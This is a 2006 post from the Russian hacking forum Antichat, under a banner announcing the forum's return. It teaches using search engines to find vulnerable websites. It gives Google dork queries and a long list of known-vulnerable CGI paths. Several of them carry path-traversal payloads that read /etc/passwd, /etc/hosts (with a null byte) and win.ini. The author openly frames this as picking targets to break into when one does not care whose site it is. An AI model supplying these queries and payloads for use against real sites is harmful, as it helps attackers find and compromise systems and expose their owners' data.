Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Ищем дырявые сайты с помощью поисковика |

06.11.2006, 15:41
|
|
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
Провел на форуме: 1310036
Репутация:
726
|
|
Ищем дырявые сайты с помощью поисковика
Сегодня мы будем учиться искать дырявые сайты в сети с помощью обычного сервака! Короче всё что нам понадобиться это обычный поисковик и немного терпения...
Для началя немного теории:
Поисковиками индексируются огромные объемы инфы. В этом море информации можно найти любые данные, главное знать как искать.
Поисковый робот индексируя новый сайт, собирает о нем всю доступную информацию, и очень часто бывает, что к нему попадают документы, на которые нет прямых ссылок, и о которых обычный пользователь как бы знать не должен. Понятно, что всему виной халатность или неграмотность админа сайта, однако во многих случаях и ПО для управления веб-проектами сохраняет конфиденциальные данные, так что они находятся в свободном доступе, главное знать URL по которому к нему обратиться.
Правильно сформировав запрос ты можешь узнать какие директории, типа root, cgi-bin, bin, admin, и т.д. находятся в свободном доступе. В запросе первым делом необходимо указать наименование дирекории, которую будем искать, и затем уже тип интересующего нас файла, который обычно не должен быть доступен пользователю, напрмер db, bin, txt.
Теперь передаем такой запрос поисковику (на примере Google)
inurl:administrator filetype:db
И видим результат. Списки адресов в которых присутствует директория Admin и файл . db вида:
_http://fresh.t-systems-sfr.com/linux/src/mysql-administrator-1.0.22a-linux.tar.gz:a/mysql-administrator/doc/images/Thumbs.db
Очень хорошо для поиска дырявых сайтов подходит поисковик Altavista.com где вводя запросы типа :url:cgi-bin, url:template, или на испанском url: pagina... можно добраться до спрятаных директорий...
Также можно формировать запросы типа:
admisapi/fpadmin.htm
/piranha/secure/passwd.php3
/cgi-bin/bizdb1-search.cgi
/cgi-bin/webplus?script=/script_dir/store.wml
/cgi-bin/webplus
/cgi-bin/webplus?script=/../../../../etc/passwd
/cgi-bin/webplus?about
/mlog.html?screen=/etc/passwd
/mlog.html
/bin/test.txt
/cgi-bin/store.cgi?StartID=../etc/hosts%00.html
/cgi-bin/bbs_forum.cgi
/cgi/commerce.cgi
/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report
/bb.sqljsp//..//..//..//..//..//../winnt/win.ini
/cgi-bin/pals-cgi
/isapi/tstisapi.dll
/ROADS/cgi-bin/search.pl
/cgi-bin/sendtemp.pl
/way-board/way-board.cgi
/cgi-bin/replicator/webpage.cgi
/cgi-bin/webspirs.cgi
/cgi-bin/auktion.pl
/ext.dll
/cgi-bin/suche/hsx.cgi
/cgi-bin/mailnews.cgi
/cgi-bin/empower
/cgi-bin/webdriver
/technote/technote/print.cgi
/cgi-bin/ezshopper3/loadpage.cgi
/form-totaller/form-totaller.cgi
/cgi-bin/mailview.cgi
/cgi-bin/wrap
/cgi-bin/db2www/library/document.d2w/show
Так ты получишь огромный список сайтов где это встречаеться... Таким образом если тебе пофиг что ломать можешь не сканируя каждый сайт по отдельности cgi сканером сразу найти то что тебе надо
Как видишь вариантов куча так что эксперементируйте.
Источкик: Daemon
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|